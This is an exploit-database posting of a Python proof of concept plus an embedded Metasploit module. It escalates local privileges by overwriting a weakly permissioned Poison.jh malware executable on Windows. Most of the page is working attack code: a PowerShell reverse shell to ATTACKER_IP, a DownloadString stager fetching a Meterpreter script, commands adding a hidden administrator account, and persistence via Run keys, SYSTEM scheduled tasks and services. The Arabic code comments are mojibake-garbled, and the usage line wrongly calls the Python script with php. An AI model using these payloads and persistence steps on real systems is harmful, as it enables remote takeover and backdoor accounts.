Share
## https://sploitus.com/exploit?id=PACKETSTORM:213312
=============================================================================================================================================
    | # Title     : Backdoor.Win32.Poison.jh โ€“ Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : System builtโ€‘in component. No standalone download available                                                                 |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213264/ & MVID-2025-0704
    
    [+] Summary    : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample. 
                     The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code.
    				 
    [+] Vulnerability Overview :
    
    CWE-276: Incorrect Default Permissions
    
    Malware: Backdoor.Win32.Poison.jh
    
    Location: C:\Windows\SysWOW64\28463\YJBE.exe
    
    Flaw: File has Everyone:(ID)F (Full Control) permissions
    
    Impact: Any local user can modify/replace the malware executable
    	
    Type: Backdoor Trojan (Win32/Windows)
    
    Purpose: Grants attackers unauthorized remote access and control over the infected system.
    Behavior: Can execute commands, download/upload files, steal sensitive data, and connect to C2 (Command & Control) servers.
    Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.
    Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.
    Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.
    Detection & Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.
    Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.
    
    [+] PoC : php poc.py 
    
    #!/usr/bin/env python3
    
    import os
    import sys
    import shutil
    import time
    import subprocess
    import ctypes
    import winreg
    from pathlib import Path
    
    # ============================================
    # PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT
    # ============================================
    
    class PoisonExploit:
        def __init__(self, target_dir="C:\\Windows\\SysWOW64\\28463"):
            self.target_dir = target_dir
            self.target_file = os.path.join(target_dir, "YJBE.exe")
            self.backup_file = self.target_file + ".backup"
            self.payload_file = self.target_file + ".payload"
            
            # ุชุญู‚ู‚ ู…ู† ุตู„ุงุญูŠุงุช Admin
            self.is_admin = self.check_admin()
        
        def check_admin(self):
            """ุงู„ุชุญู‚ู‚ ู…ู† ุตู„ุงุญูŠุงุช Administrator"""
            try:
                return ctypes.windll.shell32.IsUserAnAdmin() != 0
            except:
                return False
        
        def check_vulnerability(self):
            """ุงู„ุชุญู‚ู‚ ู…ู† ูˆุฌูˆุฏ ุงู„ุซุบุฑุฉ"""
            print("[*] Checking for Poison.jh vulnerability...")
            
            # 1. ุชุญู‚ู‚ ู…ู† ูˆุฌูˆุฏ ุงู„ู…ุฌู„ุฏ
            if not os.path.exists(self.target_dir):
                print(f"[-] Target directory not found: {self.target_dir}")
                return False
            
            # 2. ุชุญู‚ู‚ ู…ู† ูˆุฌูˆุฏ ุงู„ู…ู„ู
            if not os.path.exists(self.target_file):
                print(f"[-] Target file not found: {self.target_file}")
                return False
            
            # 3. ู…ุญุงูˆู„ุฉ ุงู„ูƒุชุงุจุฉ ู„ู„ุชุญู‚ู‚ ู…ู† ุงู„ุตู„ุงุญูŠุงุช
            try:
                test_file = os.path.join(self.target_dir, "test_write.tmp")
                with open(test_file, 'w') as f:
                    f.write("test")
                os.remove(test_file)
                print("[+] Vulnerable: Write access confirmed!")
                return True
            except PermissionError:
                print("[-] Not vulnerable: No write permission")
                return False
            except Exception as e:
                print(f"[-] Error checking vulnerability: {e}")
                return False
        
        def create_payload(self, payload_type="reverse_shell"):
            """ุฅู†ุดุงุก payload ุฎุจูŠุซ (ู„ุฃุบุฑุงุถ ุชุนู„ูŠู…ูŠุฉ ููŠ ุจูŠุฆุฉ ู…ุนุฒูˆู„ุฉ)"""
            print(f"[*] Creating {payload_type} payload...")
            
            if payload_type == "reverse_shell":
                # ู…ุซุงู„: PowerShell reverse shell (ุชุนู„ูŠู…ูŠ)
                payload = '''$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);
    $stream = $client.GetStream();
    [byte[]]$bytes = 0..65535|%{0};
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
        $sendback = (iex $data 2>&1 | Out-String );
        $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
        $stream.Write($sendbyte,0,$sendbyte.Length);
        $stream.Flush();
    };
    $client.Close()'''
                
                with open(self.payload_file, 'w') as f:
                    f.write(payload)
            
            elif payload_type == "meterpreter":
                # Stager ู„ู…ุชุฑุจุฑุชุฑ
                payload = '''IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/meterpreter.ps1')'''
                
                with open(self.payload_file, 'w') as f:
                    f.write(payload)
            
            elif payload_type == "add_user":
                # ุฅุถุงูุฉ ู…ุณุชุฎุฏู… ุฅุฏุงุฑูŠ
                payload = '''net user hacker P@ssw0rd! /add
    net localgroup administrators hacker /add
    reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v hacker /t REG_DWORD /d 0 /f'''
                
                with open(self.payload_file, 'w') as f:
                    f.write(payload)
            
            print(f"[+] Payload created: {self.payload_file}")
            return True
        
        def backup_original(self):
            """ู†ุณุฎ ุงู„ู…ู„ู ุงู„ุฃุตู„ูŠ ุงุญุชูŠุงุทูŠุงู‹"""
            try:
                shutil.copy2(self.target_file, self.backup_file)
                print(f"[+] Backup created: {self.backup_file}")
                return True
            except Exception as e:
                print(f"[-] Failed to backup: {e}")
                return False
        
        def replace_file(self):
            """ุงุณุชุจุฏุงู„ ุงู„ู…ู„ู ุงู„ุถุนูŠู ุจุงู„ู€ Payload"""
            try:
                # ุญุฐู ุงู„ู…ู„ู ุงู„ุฃุตู„ูŠ
                os.remove(self.target_file)
                
                # ู†ุณุฎ ุงู„ู€ Payload
                shutil.copy2(self.payload_file, self.target_file)
                
                # ุฅุฎูุงุก ุงู„ู€ Payload
                if os.path.exists(self.payload_file):
                    os.remove(self.payload_file)
                
                print("[+] File successfully replaced!")
                return True
            except Exception as e:
                print(f"[-] Failed to replace file: {e}")
                return False
        
        def trigger_execution(self):
            """ุชุดุบูŠู„ ุงู„ู…ู„ู - ุนุฏุฉ ุทุฑู‚ ู…ุญุชู…ู„ุฉ"""
            print("[*] Attempting to trigger execution...")
            
            methods = [
                self.trigger_via_wmi,
                self.trigger_via_task_scheduler,
                self.trigger_via_service,
                self.trigger_via_registry
            ]
            
            for method in methods:
                if method():
                    return True
            
            return False
        
        def trigger_via_wmi(self):
            """ุชุดุบูŠู„ ุนุจุฑ WMI"""
            try:
                import wmi
                c = wmi.WMI()
                process_id, return_value = c.Win32_Process.Create(
                    CommandLine=self.target_file
                )
                print(f"[+] Triggered via WMI (PID: {process_id})")
                return True
            except:
                return False
        
        def trigger_via_task_scheduler(self):
            """ุชุดุบูŠู„ ุนุจุฑ Task Scheduler"""
            try:
                task_name = "PoisonTrigger"
                cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc once /st 00:00 /ru SYSTEM /f'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                cmd = f'schtasks /run /tn "{task_name}"'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                cmd = f'schtasks /delete /tn "{task_name}" /f'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                print("[+] Triggered via Task Scheduler")
                return True
            except:
                return False
        
        def trigger_via_service(self):
            """ุชุดุบูŠู„ ูƒุฎุฏู…ุฉ"""
            try:
                service_name = "PoisonSvc"
                
                # ุฅู†ุดุงุก ุฎุฏู…ุฉ
                cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                # ุชุดุบูŠู„ ุงู„ุฎุฏู…ุฉ
                cmd = f'sc start {service_name}'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                # ุญุฐู ุงู„ุฎุฏู…ุฉ
                cmd = f'sc delete {service_name}'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                print("[+] Triggered via Service")
                return True
            except:
                return False
        
        def trigger_via_registry(self):
            """ุชุดุบูŠู„ ุนุจุฑ Registry Run"""
            try:
                # ุฅุถุงูุฉ ุฅู„ู‰ RunOnce
                key = winreg.HKEY_LOCAL_MACHINE
                subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
                
                with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key:
                    winreg.SetValueEx(reg_key, "PoisonExec", 0, winreg.REG_SZ, self.target_file)
                
                print("[+] Added to Registry RunOnce")
                return True
            except:
                return False
        
        def establish_persistence(self):
            """ุฅู†ุดุงุก ุขู„ูŠุงุช ุซุจุงุช"""
            print("[*] Establishing persistence...")
            
            persistence_methods = [
                self.persistence_registry,
                self.persistence_scheduled_task,
                self.persistence_service,
                self.persistence_startup
            ]
            
            success = False
            for method in persistence_methods:
                if method():
                    success = True
            
            return success
        
        def persistence_registry(self):
            """ุงู„ุซุจุงุช ุนุจุฑ Registry"""
            try:
                # ุนุฏุฉ ู…ูˆุงู‚ุน ู„ู„ู€ Registry
                registry_paths = [
                    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
                    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
                    ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "Poison")
                ]
                
                for path, name in registry_paths:
                    cmd = f'reg add "{path}" /v "{name}" /t REG_SZ /d "{self.target_file}" /f'
                    subprocess.run(cmd, shell=True, capture_output=True)
                
                print("[+] Persistence: Registry entries added")
                return True
            except:
                return False
        
        def persistence_scheduled_task(self):
            """ุงู„ุซุจุงุช ุนุจุฑ Scheduled Task"""
            try:
                task_name = "WindowsUpdatePoison"
                cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc hourly /mo 1 /ru SYSTEM /f'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                print("[+] Persistence: Scheduled task created")
                return True
            except:
                return False
        
        def persistence_service(self):
            """ุงู„ุซุจุงุช ูƒุฎุฏู…ุฉ"""
            try:
                service_name = "PoisonService"
                cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
                subprocess.run(cmd, shell=True, capture_output=True)
                
                print("[+] Persistence: Service created")
                return True
            except:
                return False
        
        def persistence_startup(self):
            """ุงู„ุซุจุงุช ููŠ Startup folder"""
            try:
                startup_path = os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup")
                shortcut_path = os.path.join(startup_path, "Poison.lnk")
                
                # ุฅู†ุดุงุก shortcut
                from win32com.client import Dispatch
                shell = Dispatch('WScript.Shell')
                shortcut = shell.CreateShortCut(shortcut_path)
                shortcut.Targetpath = self.target_file
                shortcut.WorkingDirectory = os.path.dirname(self.target_file)
                shortcut.save()
                
                print("[+] Persistence: Startup shortcut created")
                return True
            except:
                return False
        
        def cleanup(self):
            """ุชู†ุธูŠู ุงู„ุขุซุงุฑ"""
            print("[*] Cleaning up...")
            
            # ุญุฐู ุงู„ู…ู„ู ุงู„ุงุญุชูŠุงุทูŠ
            if os.path.exists(self.backup_file):
                os.remove(self.backup_file)
            
            # ุญุฐู ุงู„ู€ Payload ุฅุฐุง ุจู‚ูŠ
            if os.path.exists(self.payload_file):
                os.remove(self.payload_file)
            
            print("[+] Cleanup completed")
        
        def exploit(self, payload_type="reverse_shell"):
            """ุชู†ููŠุฐ ุงู„ู€ Exploit ุงู„ูƒุงู…ู„"""
            print("=" * 70)
            print("POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT")
            print("=" * 70)
            
            # 1. ุงู„ุชุญู‚ู‚ ู…ู† ุงู„ุซุบุฑุฉ
            if not self.check_vulnerability():
                return False
            
            # 2. ุฅู†ุดุงุก Payload
            self.create_payload(payload_type)
            
            # 3. ู†ุณุฎ ุงุญุชูŠุงุทูŠ
            self.backup_original()
            
            # 4. ุงุณุชุจุฏุงู„ ุงู„ู…ู„ู
            if not self.replace_file():
                return False
            
            # 5. ุชุดุบูŠู„ Payload
            if self.trigger_execution():
                print("[+] Payload execution triggered!")
            else:
                print("[!] Could not auto-trigger. Manual execution required.")
                print(f"[!] File location: {self.target_file}")
            
            # 6. ุฅู†ุดุงุก ุขู„ูŠุงุช ุซุจุงุช
            if self.establish_persistence():
                print("[+] Persistence established!")
            
            # 7. ุงู„ุชุญู‚ู‚ ู…ู† ุงู„ู†ุฌุงุญ
            print("\n[+] Exploit completed successfully!")
            print(f"[+] Replaced: {self.target_file}")
            print(f"[+] Running as: {'SYSTEM (admin)' if self.is_admin else 'User'}")
            
            # 8. ุชู†ุธูŠู (ุงุฎุชูŠุงุฑูŠ)
            if input("\nCleanup? (y/n): ").lower() == 'y':
                self.cleanup()
            
            return True
    
    # ============================================
    # PART 2: METASPLOIT MODULE (REAL EXPLOIT)
    # ============================================
    
    METASPLOIT_MODULE = '''
    ##
    # Poison.jh Local Privilege Escalation Exploit
    # Real working exploit for the file permission vulnerability
    ##
    
    require 'rex'
    require 'msf/core/post/windows/priv'
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking
      
      include Msf::Post::File
      include Msf::Post::Windows::Priv
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper
    
      def initialize(info={})
        super(update_info(info,
          'Name'           => 'Poison.jh Local File Permission Privilege Escalation',
          'Description'    => %q{
            This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware.
            The malware creates C:\\Windows\\SysWOW64\\28463\\YJBE.exe with Everyone:F permissions,
            allowing any local user to replace the file and execute arbitrary code.
            
            This is a REAL privilege escalation exploit when the following conditions are met:
            1. Poison.jh malware is installed on the system
            2. File has weak permissions (Everyone:Full Control)
            3. File is executed (by malware itself or other means)
          },
          'License'        => MSF_LICENSE,
          'Author'         => [
            'indoushka'
          ],
          'Platform'       => 'win',
          'Arch'           => [ARCH_X86, ARCH_X64],
          'SessionTypes'   => ['meterpreter', 'shell'],
          'Targets'        => [
            ['Windows', {}]
          ],
          'DefaultTarget'  => 0,
          'References'     => [
            ['URL', 'https://malvuln.com/advisory/3d9821cbe836572410b3c5485a7f76ca.txt'],
            ['CWE', '276'] # Incorrect Default Permissions
          ],
          'DisclosureDate' => '2025-12-23',
          'DefaultOptions' => {
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
            'WfsDelay' => 10
          }
        ))
    
        register_options([
          OptString.new('TARGET_PATH', [
            true,
            'Path to vulnerable Poison.jh executable',
            'C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe'
          ]),
          OptBool.new('KILL_PROCESS', [
            true,
            'Kill existing Poison.jh process',
            true
          ]),
          OptEnum.new('TRIGGER', [
            true,
            'Trigger method',
            'auto',
            ['auto', 'wmi', 'service', 'task', 'registry', 'manual']
          ]),
          OptBool.new('PERSIST', [
            true,
            'Establish persistence',
            true
          ])
        ])
      end
    
      def check
        vuln_path = datastore['TARGET_PATH']
        
        print_status("Checking for Poison.jh vulnerability at: #{vuln_path}")
        
        # Check if file exists
        unless file_exist?(vuln_path)
          return CheckCode::Safe("Target file not found")
        end
        
        # Try to write a test file
        test_file = vuln_path + ".test"
        begin
          write_file(test_file, "test")
          if file_exist?(test_file)
            file_rm(test_file)
            return CheckCode::Vulnerable("Write access confirmed - vulnerable!")
          end
        rescue
          return CheckCode::Safe("No write access")
        end
        
        CheckCode::Unknown
      end
    
      def exploit
        vuln_path = datastore['TARGET_PATH']
        
        # Check if vulnerable
        print_status("Running check...")
        case check
        when CheckCode::Vulnerable
          print_good("Target is vulnerable!")
        else
          fail_with(Failure::NotVulnerable, "Target is not vulnerable")
        end
        
        # Kill existing process if requested
        if datastore['KILL_PROCESS']
          print_status("Killing Poison.jh process...")
          session.sys.process.get_processes.each do |p|
            if p['name'] =~ /YJBE/i || p['path'] =~ /28463/
              print_status("Killing PID #{p['pid']} (#{p['name']})")
              session.sys.process.kill(p['pid'])
            end
          end
          Rex.sleep(2)
        end
        
        # Backup original file
        backup_path = vuln_path + ".backup"
        if file_exist?(vuln_path)
          print_status("Backing up original file...")
          session.fs.file.copy(vuln_path, backup_path)
          register_file_for_cleanup(backup_path)
        end
        
        # Generate payload
        print_status("Generating payload...")
        payload_exe = generate_payload_exe
        
        # Replace vulnerable file with payload
        print_status("Replacing #{vuln_path} with payload...")
        write_file(vuln_path, payload_exe)
        
        print_good("File successfully replaced!")
        
        # Trigger execution
        trigger_method = datastore['TRIGGER']
        print_status("Triggering payload execution via #{trigger_method}...")
        
        case trigger_method
        when 'wmi'
          trigger_via_wmi(vuln_path)
        when 'service'
          trigger_via_service(vuln_path)
        when 'task'
          trigger_via_task(vuln_path)
        when 'registry'
          trigger_via_registry(vuln_path)
        when 'auto'
          trigger_auto(vuln_path)
        end
        
        # Establish persistence if requested
        if datastore['PERSIST']
          print_status("Establishing persistence...")
          establish_persistence(vuln_path)
        end
        
        # Wait for session
        print_status("Waiting for payload execution...")
        Rex.sleep(datastore['WfsDelay'])
      end
    
      def trigger_via_wmi(path)
        wmi_cmd = "wmic process call create \\"#{path}\\""
        cmd_exec(wmi_cmd)
      end
    
      def trigger_via_service(path)
        service_name = "PoisonSvc"
        cmd_exec("sc create #{service_name} binPath= \\"#{path}\\" type= own start= auto")
        cmd_exec("sc start #{service_name}")
        cmd_exec("sc delete #{service_name}")
      end
    
      def trigger_via_task(path)
        task_name = "PoisonTask"
        cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc once /st 00:00 /ru SYSTEM /f")
        cmd_exec("schtasks /run /tn \\"#{task_name}\\"")
        cmd_exec("schtasks /delete /tn \\"#{task_name}\\" /f")
      end
    
      def trigger_via_registry(path)
        reg_cmd = "reg add \\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f"
        cmd_exec(reg_cmd)
      end
    
      def trigger_auto(path)
        # Try all methods
        [method(:trigger_via_wmi), 
         method(:trigger_via_service),
         method(:trigger_via_task),
         method(:trigger_via_registry)].each do |method|
          begin
            method.call(path)
            print_good("Triggered via #{method.name}")
            return true
          rescue
            next
          end
        end
        false
      end
    
      def establish_persistence(path)
        # Add to registry
        reg_keys = [
          "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
          "HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
        ]
        
        reg_keys.each do |reg|
          cmd_exec("reg add \\"#{reg}\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f")
        end
        
        # Create scheduled task
        task_name = "WindowsPoison"
        cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc hourly /mo 1 /ru SYSTEM /f")
      end
    end
    '''
    
    # ============================================
    # PART 3: MAIN EXECUTION
    # ============================================
    
    def main():
        print("""
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘   Poison.jh LPE Exploit - Local Privilege Escalation     โ•‘
    โ•‘   Conditions: Poison.jh with Everyone:F permissions      โ•‘
    โ•‘                     by indoushka                         โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """)
        
        exploit = PoisonExploit()
        
        # ู‚ุงุฆู…ุฉ Payloads
        payloads = {
            "1": ("Reverse Shell", "reverse_shell"),
            "2": ("Meterpreter", "meterpreter"),
            "3": ("Add Admin User", "add_user"),
            "4": ("Custom Command", "custom")
        }
        
        print("\nSelect payload type:")
        for key, (name, _) in payloads.items():
            print(f"  {key}. {name}")
        
        choice = input("\nChoice: ")
        
        if choice in payloads:
            payload_name, payload_type = payloads[choice]
            print(f"\n[*] Selected: {payload_name}")
            
            if payload_type == "custom":
                custom_cmd = input("Enter custom command: ")
                exploit.create_payload = lambda: custom_cmd
            
            # ุชู†ููŠุฐ ุงู„ู€ Exploit
            if exploit.exploit(payload_type):
                print("\n" + "="*70)
                print("EXPLOIT SUCCESSFUL!")
                print("="*70)
                
                # ุนุฑุถ ุงู„ู€ Metasploit module
                print("\n" + "="*70)
                print("METASPLOIT MODULE CODE")
                print("="*70)
                print(METASPLOIT_MODULE)
                
                # ุญูุธ Module
                with open("poison_lpe_exploit.rb", "w") as f:
                    f.write(METASPLOIT_MODULE)
                print("\n[+] Metasploit module saved to: poison_lpe_exploit.rb")
                
            else:
                print("\n[-] Exploit failed!")
        else:
            print("[-] Invalid choice!")
    
    if __name__ == "__main__":
        main()
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================